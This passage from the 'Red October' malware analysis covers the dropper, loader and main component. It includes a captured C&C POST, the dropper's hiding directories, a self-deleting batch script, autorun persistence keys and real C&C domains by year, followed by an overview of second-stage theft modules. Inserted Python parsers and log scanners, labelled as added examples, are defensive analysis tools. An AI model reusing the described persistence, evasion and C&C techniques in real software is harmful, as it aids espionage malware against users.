00000060 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 3a 20 36 |ontent-length: 6|
00000070 32 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a |2..Content-Type:|
00000080 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 | application/x-w|
00000090 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 |ww-form-urlencod|
000000a0 65 64 0d 0a 0d 0a 69 64 3d 41 41 41 39 33 39 35 |ed....id=AAA9395|
000000b0 37 35 32 39 35 33 31 32 35 30 35 31 34 30 32 36 |7529531250514026|
000000c0 31 30 30 36 43 43 43 39 33 33 30 30 39 42 42 42 |1006CCC933009BBB|
000000d0 31 36 35 34 31 35 31 33 26 41 3d 31 26 42 3d 31 |16541513&A=1&B=1|
000000e0 26 43 3d 32 |&C=2|

HTTP POST request sent to the C&C server

The module decrypts the C&C response with the AMPRNG algorithm using a hardcoded key. Then, it checks if there is a valid EXE signature ("MZ") at offset 37 in the decrypted buffer. If the signature is present, it writes the EXE file to "%TEMP%\nvsvc%p%p.exe" (%p depends on system time) and executes it.

3rd stage of the Java exploit attack: EXE, unknown
Currently, the C&C server is unavailable and we do not have the executables that were served to the "javaln.exe" downloader. Most likely, they were the actual droppers, similar to the ones used with Word and Excel exploits.

2. Dropper
The dropper module is a PE EXE file, compiled with Microsoft Visual Studio 2008. It is extracted and executed by one of the exploits used to deliver the malware to the victim.

Known variants drop and execute the “loader” component named “svchost.exe” or “svclogon.exe” and one encrypted main component file (see description of the “loader” component).

Main function
Registry key check
The module generates a CLSID from the value of the SHA1 checksum of the system directory path and the serial number of the system drive.

Then, it tries to read the default value of the registry key:

HKLM\Software\Classes\CLSID\generated_CLSID (if it has administrative rights)
HKCU\Software\Classes\CLSID\generated_CLSID (if it has no administrative rights)

It checks the contents of the default key value. The check succeeds if the registry key is not present or its value is equal to the last DWORD of the file’s SHA1 checksum. Otherwise the check fails and it repeats the check every 3 milliseconds, up to 4294967294 times.

Page 18: Red october. detailed malware description

Then, it sets the default value of the registry key to the hexadecimal representation of the last DWORD of the SHA1 and tries to read the registry value “InfoTip” from the same key. The registry value is assumed to be a 48-byte binary buffer. It extracts a time parameter from that buffer and self-deletes if the difference between the recorded time and the current time is less than 3 days.

This means that updated modules cannot be delivered to the same victim sooner than three days after the last infection: if someone tries to reinfect the system with the same dropper, it refuses to do so within 3 days of the last infection. This may also be a mechanism for escaping the attention of power users or administrators who might run a recently opened suspicious application again and monitor its activity.

This check is identical to the one implemented in the “loader” module.

Installation routine

The module retrieves its resource of type “AAA” and name “000”. The resource is then decrypted using a custom RC4-like cipher with a hardcoded key.

Offset Type Description

0 DWORD If equal to “1”, the dropper should self-delete and exit after processing the resource

4 DWORD If equal to “1”, the dropper should exit after processing the resource

8 DWORD Delay in milliseconds before processing the resource

The resource header is followed by data entries each containing one file.

Offset Type Description

0 DWORD Record type

4 DWORD Size of the file name in bytes

8 DWORD Size of the file contents

12 DWORD Reserved, equal to 0x7D4

16 BYTE[] File name, Unicode

16 + size of the file name BYTE[] File contents

Every record is processed differently depending on the “Record type” value:

Record type Action

0x07 Write the file to disk

0x08 Write the file to disk and execute it immediately with the CreateProcess() API

0x09, 0x0A, 0x0D, 0x0E Write to a predefined directory: %System Directory%\wmispoold\%file name% (if it has administrative rights) or %APPDATA%\wmispoold\%file name% (if it has user-only rights). 0x09 – create a new file and write to it; 0x0A – create a new file, write and execute it; 0x0D – overwrite the file; 0x0E – overwrite and execute the file. Tries to terminate any running process that belongs to the file being (over)written.

0x0B, 0x0C Write to the first available directory from the hardcoded list (see below). 0x0B – write the file; 0x0C – write and execute the file.

The module sets file creation/modification time equal to the one of the “%windir%\system32\kernel32.dll” file.

For record types 0x0B and 0x0C, the module tries to write the file to the first available directory from the list:

%ProgramFiles%\Windows NT\
%APPDATA%\Microsoft\
%ProgramFiles%\Windows NT\Accessories\
%ProgramFiles%\Windows NT\Pinball\
%ProgramFiles%\Windows Media Player\
%ProgramFiles%\Web Publish\
%ProgramFiles%\Outlook Express\
%ProgramFiles%\Microsoft Office\Office10\Data\
%ProgramFiles%\Microsoft Office\Office10\
%ProgramFiles%\Microsoft Frontpage\
%ProgramFiles%\Internet Explorer\
%ProgramFiles%\ComPlus Applications\
%ProgramFiles%\WindowsUpdate\
%CommonProgramFiles%\Microsoft Shared\MsInfo\
%CommonProgramFiles%\Microsoft Shared\Office10\
%CommonProgramFiles%\Proof\
%CommonProgramFiles%\Web Folders\
%CommonProgramFiles%\Web Server Extensions\
%CommonProgramFiles%\System\ado\
%CommonProgramFiles%\System\msadc\
%SystemDrive%\Documents and Settings\LocalService\Application Data\Microsoft\
%SystemDrive%\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\
%ALLUSERSPROFILE%\Application Data\
%windir%\Installer\
%windir%\Help\Tours\mmTour\
%windir%\Help\Tours\htmTour\
%windir%\Help\Tours\WindowsMediaPlayer\
%windir%\IME\
%windir%\MsApps\
%windir%\MsApps\MsInfo\
%windir%\inf\
%ALLUSERSPROFILE%\Application Data\Microsoft\
%ALLUSERSPROFILE%\Application Data\Microsoft\Office\
%ALLUSERSPROFILE%\Application Data\Microsoft\Office\Data\
%ALLUSERSPROFILE%\Application Data\Microsoft\Windows\
%HOMEPATH%\Local Settings\
%APPDATA%\
%APPDATA%\Microsoft\Office\
%APPDATA%\Microsoft\Office\Data\
%APPDATA%\Microsoft\Windows\
%windir%\Temp\
%TMP%\
%TEMP%\
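The resource layout and record-type table above are enough to write a parser for a decrypted “AAA/000” resource. The following Python is an added example, not code from the report or from the malware: it builds a constructed sample blob in the format described, parses it, and resolves what the dropper would do with each record (target directory, whether the file is executed, whether running processes are terminated). The RC4-like cipher and its key are not described here, so the example starts from an already-decrypted buffer; the search-directory list is abbreviated to a few entries from the list above, and the dir_exists predicate stands in for a real filesystem check.

```python
import struct

RESERVED = 0x7D4                      # constant in every record header per the report
WMISPOOLD_TYPES = {0x09, 0x0A, 0x0D, 0x0E}
SEARCH_DIR_TYPES = {0x0B, 0x0C}
EXECUTE_TYPES = {0x08, 0x0A, 0x0C, 0x0E}
OVERWRITE_TYPES = {0x0D, 0x0E}

# Abbreviated head and tail of the report's search list; the real list is longer.
SEARCH_DIRS = [
    r"%ProgramFiles%\Windows NT",
    r"%APPDATA%\Microsoft",
    r"%windir%\Temp",
    r"%TEMP%",
]


def parse_resource(blob):
    """Parse a decrypted resource: 12-byte header, then variable-length file records."""
    self_delete, exit_after, delay_ms = struct.unpack_from("<III", blob, 0)
    header = {"self_delete": self_delete == 1,
              "exit_after": exit_after == 1,
              "delay_ms": delay_ms}
    records, off = [], 12
    while off + 16 <= len(blob):
        rtype, name_len, data_len, reserved = struct.unpack_from("<IIII", blob, off)
        if reserved != RESERVED:
            raise ValueError("bad reserved field 0x%X at offset %d" % (reserved, off))
        off += 16
        name = blob[off:off + name_len].decode("utf-16-le").rstrip("\x00")
        off += name_len
        data = blob[off:off + data_len]
        if len(data) != data_len:
            raise ValueError("truncated record %r" % name)
        off += data_len
        records.append({"type": rtype, "name": name, "data": data})
    return header, records


def plan_record(rec, is_admin, dir_exists):
    """Return what the dropper does with one record, following the record-type table."""
    t = rec["type"]
    if t in (0x07, 0x08):
        target = rec["name"]                      # path taken from the record itself
    elif t in WMISPOOLD_TYPES:
        base = r"%SystemDirectory%\wmispoold" if is_admin else r"%APPDATA%\wmispoold"
        target = base + "\\" + rec["name"]
    elif t in SEARCH_DIR_TYPES:
        base = next((d for d in SEARCH_DIRS if dir_exists(d)), None)
        if base is None:
            raise RuntimeError("no directory from the hardcoded list is available")
        target = base + "\\" + rec["name"]
    else:
        raise ValueError("unknown record type 0x%02X" % t)
    return {"path": target,
            "execute": t in EXECUTE_TYPES,
            "overwrite": t in OVERWRITE_TYPES,
            "kill_running": t in WMISPOOLD_TYPES}


def build_record(rtype, name, data):
    """Assemble one record; used only to construct the sample below."""
    name_bytes = name.encode("utf-16-le")
    return struct.pack("<IIII", rtype, len(name_bytes), len(data), RESERVED) + name_bytes + data


# Constructed sample: self-delete after processing, 5 s delay, three records.
# Payload bytes are placeholders, not real malware.
SAMPLE_BLOB = (
    struct.pack("<III", 1, 0, 5000)
    + build_record(0x0A, "svchost.exe", b"MZ\x90\x00placeholder")
    + build_record(0x09, "fsmgmtio32.msc", b"\xde\xad\xbe\xef")
    + build_record(0x0C, "svclogon.exe", b"MZ\x90\x00placeholder")
)


def demo(is_admin=False):
    """Parse the sample for a user whose only existing listed directory is under %APPDATA%."""
    header, records = parse_resource(SAMPLE_BLOB)
    plans = [plan_record(r, is_admin, lambda d: d.startswith("%APPDATA%")) for r in records]
    return header, records, plans


if __name__ == "__main__":
    hdr, recs, plans = demo()
    print(hdr)
    for r, p in zip(recs, plans):
        print("0x%02X %-16s -> %s exec=%s kill=%s"
              % (r["type"], r["name"], p["path"], p["execute"], p["kill_running"]))
```

Run as a script to see the plan for the constructed sample; to use it on a real sample, decrypt the resource first and pass the plaintext to parse_resource. The reserved-field check is a cheap way to detect that the decryption key or cipher guess was wrong before anything else is parsed.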


Post processing

The module deletes the following registry keys:

HKCU\Software\Microsoft\Office\11.0\Word\Resiliency\StartupItems
HKCU\Software\Microsoft\Office\11.0\Word\Resiliency\DisabledItems

This is done to erase the list of Microsoft Word documents that might need recovery, probably so that the document containing the exploit is not offered for recovery again if it crashed the Microsoft Word process.

Self removal procedure

The dropper creates a file “%TEMP%\msc.bat”, executes it and exits, effectively deleting its own body:

chcp 1251
:Repeat
attrib -a -s -h -r "%path to own executable file%"
del "%path to own executable file%"
if exist "%path to own executable file%" goto Repeat
del "%path to own executable file%"

Known variants

MD5 Compilation date (source) Compilation date (payload)

D784EAB30F85D2CDFB14ED1B0D98C98C 2011.07.06 07:41:01 (GMT) 2011.03.15 07:43:59 (GMT)

418B7A888484BDCBBA3B431ACC57B6AB 2011.09.22 04:52:59 (GMT) 2011.03.15 07:43:59 (GMT)

5C23DBF7B2BED5D54EADC47889EE1038 2011.06.23 09:53:26 (GMT) 2011.03.15 07:43:59 (GMT)

EA2765A3D9F865EF7546BA7F5F145E95 2011.06.30 08:26:29 (GMT) 2011.03.15 07:43:59 (GMT)

4A5F5C6E1AD30CF2799E3EA13468B3C2 2011.07.07 09:27:34 (GMT) 2011.03.15 07:43:59 (GMT)

A03CCD50DB47361E6BD9B05017372110 2011.04.21 10:47:12 (GMT) 2011.03.15 07:43:59 (GMT)

FA28873EFD2279E9AF79202E9A7E9398 2011.08.16 06:31:24 (GMT) 2011.03.15 07:43:59 (GMT)

4ACE8A18C8710B40FF9B47F29F82EAC7 2011.08.18 06:21:22 (GMT) 2011.03.15 07:43:59 (GMT)

204F7BFA78ED99E623DEF43BA0A188C9 2011.07.20 13:04:53 (GMT) 2011.03.15 07:43:59 (GMT)

35061250A7C580A4CEA31F29E050C4FF 2011.03.14 14:46:51 (GMT) 2011.03.03 12:50:46 (GMT)

58C5D4158DF279E9038344D0B420BEDE 2011.03.14 14:58:56 (GMT) 2011.03.03 12:50:46 (GMT)

24546BB958EDD449408BA1AADDB3DCEB 2011.03.04 11:46:39 (GMT) 2011.03.02 09:45:07 (GMT)

2541C266893A45F393112C6F15C2A0C7 2011.01.13 07:59:02 (GMT) 2010.10.11 14:14:34 (GMT)

B0D190A48E749B2688E7A90CE3926E84 2011.03.09 08:58:07 (GMT) 2011.03.03 12:50:46 (GMT)

3E35C7C39BC71BADFE9AD15752C2DDDE 2012.09.06 10:30:38 (GMT) 2011.03.15 07:43:59 (GMT)

EBCCD9FC831B168D872F6556B4A42DAC 2011.03.15 08:33:11 (GMT) 2011.03.15 07:43:59 (GMT)

7AAC26EA551EC67882E14C388E436F10 2011.03.15 09:06:51 (GMT) 2011.03.15 07:43:59 (GMT)

5F1D10F7CA9E1B9C301872B1BC4B8A18 2011.05.06 07:58:13 (GMT) 2011.03.15 07:43:59 (GMT)

812FC1780548F0611E3F4105E48E518A 2011.05.26 11:04:38 (GMT) 2011.03.15 07:43:59 (GMT)

DC0A5753F9885D0BA71ECEA767F91564 2011.07.20 11:06:28 (GMT) 2011.03.15 07:43:59 (GMT)


D44966B31FC6BAFF97AE23EA53A6DFF0 2011.10.06 14:05:34 (GMT) 2011.03.15 07:43:59 (GMT)

141DC8FD84D985F792DE9747F63C6A4C 2011.03.14 15:00:23 (GMT) 2011.03.03 12:50:46 (GMT)

8CE5E706D956D28F6412C38FC5911DCE 2011.03.09 08:18:38 (GMT) 2011.03.03 12:50:46 (GMT)

0C4D3483AD48A4751E288993388E03D2 2011.03.14 14:49:50 (GMT) 2011.03.03 12:50:46 (GMT)

9BD07F7DC5E26F022FDEA386D35EAC68 2011.03.09 07:46:51 (GMT) 2011.03.03 12:50:46 (GMT)

1754024F9932DC25691CDB90D8FAC632 2011.04.13 05:34:30 (GMT) 2011.03.15 07:43:59 (GMT)

4168EEF52CD458B253EBE62B8DAF75AC 2011.03.14 13:34:01 (GMT) 2011.03.03 12:50:46 (GMT)

2B62D48C9D728C5D9650B39E0119F1B7 2010.11.12 09:29:19 (GMT) 2010.10.11 14:14:34 (GMT)

EA74E951111ED2E046B87C0A9241FC25 2012.08.02 05:59:07 (GMT) 2011.03.15 07:43:59 (GMT)

3BE885097DBD3DF03B568D1E248A2E4C 2012.09.13 09:41:13 (GMT) 2011.03.15 07:43:59 (GMT)

B952997DD0AB0B58F916AF89A5C3E4BD 2011.04.29 10:02:22 (GMT) 2011.03.15 07:43:59 (GMT)

2216490B1C09BB9B4E07AD05A1552FE9 2012.04.06 11:35:36 (GMT) 2011.03.15 07:43:59 (GMT)

DBE4C33F6C482D571305589207A3F910 2011.03.14 14:57:27 (GMT) 2011.03.03 12:50:46 (GMT)

8E88185368C9C2C53014E0BAEFCE3066 2011.03.09 08:05:16 (GMT) 2011.03.03 12:50:46 (GMT)

3. Loader module

Known file locations:

%PROGRAMFILES%\Windows NT\svchost.exe
%PROGRAMFILES%\Windows NT\svclogon.exe

The module is a PE EXE file, compiled with Microsoft Visual Studio 2005.

This module is created by the first-stage dropper of the malware, usually from a file containing an exploit.

It creates a system event object using name patterns:

“WIN_%08X%08X%08X%08X%08X”, where the “%08X” parameters are replaced by the hexadecimal value of the file body checksum (SHA1).
“SYS_%08X%08X%08X%08X%08X”, where the “%08X” parameters are replaced by the hexadecimal value of the file name checksum (SHA1).

Then, the module checks whether it was granted administrative rights and sets a corresponding flag, which is used in several subroutines.

The module generates a CLSID from the SHA1 checksum of the system directory path and the volume serial number of the system drive.

Then, it tries to read the default value of the following registry key:

HKLM\Software\Classes\CLSID\generated_CLSID (if it has administrative rights)
HKCU\Software\Classes\CLSID\generated_CLSID (if it has no administrative rights)

It checks the contents of the default key value. The check succeeds if the registry key is not present or its value is equal to the last DWORD of the file’s SHA1 checksum. Otherwise the check fails and it repeats the check every 3 milliseconds, up to 4294967294 times.

Then, it sets the default value of the registry key to the hexadecimal representation of the last DWORD of the SHA1 and tries to read the registry value “InfoTip” from the same key. The registry value is assumed to be a 48-byte binary buffer. It reads the time value from that buffer and exits if the difference between the recorded time and the current time is less than 3 days.

This means that updated modules cannot be delivered to the same victim sooner than three days after the last infection: if someone tries to reinfect the system with the same dropper, it refuses to do so within 3 days of the last infection. This may also be a mechanism for escaping the attention of power users or administrators who might run a recently opened suspicious application again and monitor its activity.
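Both the dropper (registry key check above) and the loader (event object names and the identical registry check) derive their markers from a SHA1 of the sample, so an analyst holding a sample can precompute what to look for on a host. The following Python is an added example, not the malware's code: it computes the WIN_/SYS_ event names and the CLSID default value for a given file, implements the 3-day guard on a timestamp, and flags exported CLSID keys that carry an 8-hex-digit default value next to a 48-byte InfoTip. Assumptions, also marked in the comments: the SHA1 words are formatted big-endian (which makes the name equal to the upper-case hex digest), the file name is hashed as ASCII, the InfoTip timestamp is treated as a Unix time, and the registry entries are constructed.

```python
import hashlib
import time


def sha1_words(data, little_endian=False):
    """SHA1 digest as five 32-bit words.

    The report says the names are built with five "%08X" conversions of the
    checksum. Formatting the digest words big-endian reproduces the upper-case
    hex digest; that byte order is an assumption, so little_endian=True is
    offered for comparison against a live event object if the first guess fails."""
    digest = hashlib.sha1(data).digest()
    order = "little" if little_endian else "big"
    return [int.from_bytes(digest[i:i + 4], order) for i in range(0, 20, 4)]


def event_names(file_body, file_name, little_endian=False):
    """Expected WIN_/SYS_ event object names for a loader sample.
    Assumption: the file name is hashed as its ASCII bytes (base name only)."""
    win = "WIN_" + "".join("%08X" % w for w in sha1_words(file_body, little_endian))
    sys_ = "SYS_" + "".join("%08X" % w for w in sha1_words(file_name.encode("ascii"), little_endian))
    return win, sys_


def registry_marker(file_body, little_endian=False):
    """Value the dropper/loader writes as the default of its generated CLSID key:
    the hexadecimal form of the last DWORD of the file's SHA1."""
    return "%08X" % sha1_words(file_body, little_endian)[-1]


def reinfection_blocked(recorded_time, now=None, min_days=3):
    """The 3-day guard from the report: True when the InfoTip timestamp is too recent.
    Both values are Unix times here (assumption); the real layout of the 48-byte
    InfoTip buffer is not given, so locating the timestamp is left to the caller."""
    now = time.time() if now is None else now
    return (now - recorded_time) < min_days * 86400


def suspicious_clsid_entries(entries):
    """Hunt over exported CLSID keys. Each entry is a dict with 'key', 'default'
    (the default value as a string, or None) and 'infotip' (bytes or None).
    A default value that is exactly 8 hex digits next to a 48-byte binary
    InfoTip matches the pattern described for the dropper and loader."""
    hits = []
    for e in entries:
        default = e.get("default") or ""
        infotip = e.get("infotip")
        is_hex_dword = len(default) == 8 and all(c in "0123456789ABCDEFabcdef" for c in default)
        if is_hex_dword and isinstance(infotip, (bytes, bytearray)) and len(infotip) == 48:
            hits.append(e["key"])
    return hits


# Constructed registry export: one ordinary shell-extension CLSID (the 7-Zip
# one the Recon module also records) and one key shaped like the malware's
# marker; the all-zero GUID is made up for the example.
SAMPLE_ENTRIES = [
    {"key": r"HKCU\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}",
     "default": "7-Zip Shell Extension", "infotip": None},
    {"key": r"HKCU\Software\Classes\CLSID\{00000000-0000-0000-0000-000000000000}",
     "default": registry_marker(b""), "infotip": bytes(48)},
]

if __name__ == "__main__":
    print(event_names(b"", "svchost.exe"))
    print(registry_marker(b""))
    print(suspicious_clsid_entries(SAMPLE_ENTRIES))
```

On a live host the entries would come from a registry export of HKLM and HKCU\Software\Classes\CLSID; the generated CLSID itself cannot be predicted without the exact derivation, which is why the hunt keys on the shape of the values rather than on the key name.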

Then, it starts a registry installation thread and proceeds to its main loop.

Registry installation thread

Every 100 seconds the module ensures that it has been registered for autorun using one of the registry keys:

If launched as administrator, it appends the path to its own file to:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

Else, it writes a registry value in:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\%autorun key% =”path to itself”

Possible Autorun key values that we have observed:

Name of the encrypted main module Name of the “Run” registry value

fsmgmtio32.msc DotNet32

cfsyn.pcs SdbChk

frpdhry.hry Hre32

ime64ex.ncs SrvCC32

io32.ocx Ocx32

lhafd.gcp Lha

lsc32i.cmp Lsc32

ocxstate.dat NtNdsc

opdocx.gxt Scpsts

sccme.hrp Lhrp

scprd.hrd Srsf

syncls.gxk Mslisht

lgdrke.swk Sltrdbe

sdlvk.acx Ltsmde

wsdktr.ltp Lsrtmpx

synhfr.pkc Msdcc

scpkrp.gmx Dbxchek

rfkscp.pck Cskcmp

qsdtlp.rcp Klsmod


Main loop

The module runs a loop with random Sleep() delays and checks if it can fetch one of the URLs at microsoft.com.

Name of the encrypted main module Hostnames

fsmgmtio32.msc update.microsoft.com, www.microsoft.com

Other update.microsoft.com, www.microsoft.com, support.microsoft.com

If any of the URLs are available, it starts the loader thread with the filename of the main module (see Appendix A) as a parameter. Then, it updates the “InfoTip” registry value with the current time and the SHA1 of its filename. It also stores its own process ID in that value.

The module reads the proxy server settings of Internet Explorer, Firefox and Opera and tries to fetch the URLs via these proxies when a direct connection is not available.

Loader thread

The module reads the file that contains the main module, decrypts it using RC4 with a hard-coded key, and then decompresses it using the Zlib library. Then, it checks that the decompressed buffer contains a PE file and starts the PE loader thread.

PE loader thread

The module implements its own PE loader. The file that is loaded is expected to be a DLL. After loading and relocating the PE, the module calls its DllMain function twice (DLL_PROCESS_ATTACH, DLL_PROCESS_DETACH) and returns.


4. Main component

The file is a PE DLL with no export symbols, compiled with Microsoft Visual Studio 2005.

DllMain function

The module sets a timer with a callback function to be executed every 900 seconds and starts a Windows message loop.

Timer callback function

The module checks if the computer is connected to the Internet (using the InternetGetConnectedState API) and, if it is connected, starts its main thread.

HTTP Traffic generated by the main component.

Main thread

The module prepares a 98-byte buffer that contains several unique machine identifiers derived from its system drive’s serial number, the network adapters’ MAC addresses and the Internet Explorer registration ID. The buffer also contains a unique hard-coded hexadecimal string that appears to be a victim or campaign ID, and a hard-coded DWORD value.


Then, it sends this buffer to the first available C&C server from a hardcoded list using HTTP POST requests. The module expects to receive an encrypted response packet from the server. It decrypts the packet with a simple XOR algorithm and executes one of the following commands depending on the data contained in the packet:

- Load the DLL from the packet in memory and execute its DllMain
- Write the packet to a file in the temporary/windows/system directory and execute it using CreateProcess()
- Load a DLL by a specified local path and call its DllMain, or execute a program given its path
- Write the packet to a file in the temporary/windows/system directory
- Write the contents of the packet to %TEMP%\bestcrypt_update.exe and (optional part) %TEMP%\bestcrypt_update.dll and execute the EXE file

C&C server usage timeline

Year  C&C domain names                                                           URL

2007  msgenuine.net                                                              /cgi-bin/view

2008  msinfoonline.org                                                           /cgi-bin/a/slice

2009  microsoftosupdate.com; microsoft-msdn.com; microsoftcheck.com              /cgi-bin/ms/check
      osgenuine.com; wingenuine.com; update-genuine.com                          /cgi-bin/gen/jau

2010  drivers-update-online.com; drivers-get.com; drivers-check.com              /cgi-bin/driver/info
      genuine-check.com; genuineservicecheck.com; genuineupdate.com              /cgi-bin/genuine/a
      msonlineupdate.com; msonlinecheck.com; msonlineget.com                     /cgi-bin/online/set
      os-microsoft-check.com; os-microsoft-update.com; os-microsoft-online.com   /cgi-bin/microsoft/dev
      windowscheckupdate.com; windows-genuine.com; windowsonlineupdate.com       /cgi-bin/win/wcx

2011  dll-host-update.com; dll-host-check.com; dll-host.com                      /cgi-bin/dllhost/ac
      genuine-check.com; genuineservicecheck.com; genuineupdate.com              /cgi-bin/genuine/a
      microsoftosupdate.com; microsoft-msdn.com; microsoftcheck.com              /cgi-bin/ms/check
      ms-software-check.com; ms-software-update.com; ms-software-genuine.com     /cgi-bin/software/tau
      nt-windows-online.com; nt-windows-update.com; nt-windows-check.com         /cgi-bin/nt/th
      svchost-check.com; svchost-online.com; svchost-update.com                  /cgi-bin/svchost/uat

2012  csrss-check-new.com; csrss-update-new.com; csrss-upgrade-new.com           /cgi-bin/csrss/dfl
      ms-software-check.com; ms-software-update.com; ms-software-genuine.com     /cgi-bin/software/tau
      nt-windows-online.com; nt-windows-update.com; nt-windows-check.com         /cgi-bin/nt/th
      svchost-check.com; svchost-online.com; svchost-update.com                  /cgi-bin/svchost/uat
      wins-driver-check.com; wins-driver-update.com; win-driver-upgrade.com      /cgi-bin/ntdriver/ton
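The timeline above, together with the first-stage POST to /reportdatas.php captured earlier, is the kind of list a defender turns into a proxy-log check. The Python below is an added example, not code from the report: it expands the domain groups into a lookup, parses constructed Squid-style access-log lines (the log format, client addresses and server IPs are assumptions), and reports whether a request hit a known domain and path. A request that matches a domain but not the listed path is still reported as "domain-only", since the paths changed between campaign years; the microsoft.com URLs the loader fetches as a connectivity check are deliberately absent from the list because they are legitimate traffic.

```python
import re
from urllib.parse import urlsplit

# Domain groups and URL paths copied from the C&C usage timeline above, plus the
# first-stage downloader endpoint seen in the captured POST (dailyinfonews.net).
CNC_TABLE = [
    ("msgenuine.net", "/cgi-bin/view"),
    ("msinfoonline.org", "/cgi-bin/a/slice"),
    ("microsoftosupdate.com;microsoft-msdn.com;microsoftcheck.com", "/cgi-bin/ms/check"),
    ("osgenuine.com;wingenuine.com;update-genuine.com", "/cgi-bin/gen/jau"),
    ("drivers-update-online.com;drivers-get.com;drivers-check.com", "/cgi-bin/driver/info"),
    ("genuine-check.com;genuineservicecheck.com;genuineupdate.com", "/cgi-bin/genuine/a"),
    ("msonlineupdate.com;msonlinecheck.com;msonlineget.com", "/cgi-bin/online/set"),
    ("os-microsoft-check.com;os-microsoft-update.com;os-microsoft-online.com", "/cgi-bin/microsoft/dev"),
    ("windowscheckupdate.com;windows-genuine.com;windowsonlineupdate.com", "/cgi-bin/win/wcx"),
    ("dll-host-update.com;dll-host-check.com;dll-host.com", "/cgi-bin/dllhost/ac"),
    ("ms-software-check.com;ms-software-update.com;ms-software-genuine.com", "/cgi-bin/software/tau"),
    ("nt-windows-online.com;nt-windows-update.com;nt-windows-check.com", "/cgi-bin/nt/th"),
    ("svchost-check.com;svchost-online.com;svchost-update.com", "/cgi-bin/svchost/uat"),
    ("csrss-check-new.com;csrss-update-new.com;csrss-upgrade-new.com", "/cgi-bin/csrss/dfl"),
    ("wins-driver-check.com;wins-driver-update.com;win-driver-upgrade.com", "/cgi-bin/ntdriver/ton"),
    ("dailyinfonews.net", "/reportdatas.php"),
]


def build_iocs(table=CNC_TABLE):
    """Expand the ';'-separated domain groups into a {domain: expected path} lookup."""
    iocs = {}
    for domains, path in table:
        for d in domains.split(";"):
            iocs[d.strip().lower()] = path
    return iocs


# Squid native access-log layout (assumed): time elapsed client code/status bytes method URL ...
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)")


def host_matches(host, domain):
    """Exact match or a subdomain of the listed domain (www. prefixes are common)."""
    return host == domain or host.endswith("." + domain)


def scan_proxy_log(lines, iocs=None):
    """Return (client, host, path, verdict) for every line touching a listed domain.
    verdict is 'cnc' when the URL path also matches, else 'domain-only'."""
    iocs = build_iocs() if iocs is None else iocs
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("url"))
        host = (parts.hostname or "").lower()
        for domain, path in iocs.items():
            if host_matches(host, domain):
                verdict = "cnc" if parts.path == path else "domain-only"
                hits.append((m.group("client"), host, parts.path, verdict))
                break
    return hits


# Constructed log lines: private client addresses, documentation-range server IPs.
SAMPLE_LOG = [
    "1330000000.123 210 10.1.2.3 TCP_MISS/200 512 POST http://www.dailyinfonews.net:80/reportdatas.php - DIRECT/203.0.113.5 text/html",
    "1330000100.456 180 10.1.2.3 TCP_MISS/200 900 POST http://nt-windows-online.com/cgi-bin/nt/th - DIRECT/203.0.113.6 text/html",
    "1330000200.789 90 10.1.2.4 TCP_MISS/200 1200 GET http://update.microsoft.com/ - DIRECT/198.51.100.1 text/html",
    "1330000300.000 60 10.1.2.5 TCP_MISS/404 300 GET http://svchost-update.com/index.html - DIRECT/203.0.113.7 text/html",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        print("%s -> %s%s [%s]" % hit)
```

The loader also sets persistence and polls microsoft.com before it ever contacts a C&C, so the first listed hit from a client is usually the main component's POST, not the loader; correlate the client address with the autorun and CLSID artefacts described above rather than expecting one log line to tell the whole story.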

Main component file names

Year  File name of the main component

2007  netads.dat

2008  smartiosys.dbn

2009  smartiosys.dbn

2010  fsmgmtio32.msc, ime64ex.ncs, ocxwinsmb.tlb

2011  frpdhry.hry, ime64ex.ncs, io32.ocx, lhafd.gcp, lsc32i.cmp, ocxstate.dat, sccme.hrp, scprd.hrd

2012  klsldr.slr, lgdrke.swk, lsmpdr.vcs, mbdsec.sdx, ocxstate.dat, opdocx.gxt, qsdtlp.rcp, rfkscp.pck, scpesc.ecs, scpkrp.gmx, sdlvk.acx, syncls.gxk, synhfr.pkc, wsdktr.ltp

Example of C&C communication session (two bytes of the User ID were removed)


“Red October”. Detailed Malware Description 2. Second Stage of Attack - Securelist
Source: http://www.securelist.com/en/analysis/204792268/Red_October_Detailed_Malware_Description_2_Second_Stage_of_Attack

“Red October”. Detailed Malware Description 2. Second Stage of Attack

First stage of attack

1. Exploits
2. Dropper
3. Loader Module
4. Main component

Second stage of attack
1. Modules, general overview
2. Recon group
3. Password group
4. Email group
5. USB drive group
6. Keyboard group
7. Persistence group
8. Spreading group
9. Mobile group
10. Exfiltration group

1. Modules, general overview

Module framework

The main component of Sputnik implements a framework for executing the “tasks” that are provided by its C&C servers.

Most of the tasks are provided as one-time PE DLL libraries that are received from the server, executed in memory and then immediately discarded.

Several tasks need to be constantly present, e.g. waiting for an iPhone or Nokia phone to connect. These tasks are provided as PE EXE files and are installed on the infected machine.

Persistent tasks

- Once a USB drive is connected, search and extract files by mask/format, including deleted files. Deleted files are restored using a built-in file system parser
- Wait for an iPhone or a Nokia phone to be connected. Once connected, retrieve information about the phone, its phone book, contact list, call history, calendar, SMS messages and browsing history
- Wait for a Windows Mobile phone to be connected. Once connected, infect the phone with a mobile version of the Sputnik main component
- Wait for a specially crafted Microsoft Office or PDF document and execute a malicious payload embedded in that document, implementing a one-way covert channel of communication that can be used to restore control of the infected machine
- Record all keystrokes, make screenshots
- Execute additional encrypted modules according to a pre-defined schedule
- Retrieve e-mail messages and attachments from Microsoft Outlook and from reachable mail servers using previously obtained credentials

One-time tasks

- Collect general software and hardware environment information
- Collect filesystem and network share information, build directory listings, search and retrieve files by mask provided by the C&C server
- Collect information about installed software, most notably Oracle DB, RAdmin, IM software including Mail.Ru agent, drivers and software for Windows Mobile, Nokia, SonyEricsson, HTC and Android phones, USB drives
- Extract browsing history from Chrome, Firefox, Internet Explorer, Opera
- Extract saved passwords for Web sites, FTP servers, mail and IM accounts
- Extract Windows account hashes, most likely for offline cracking
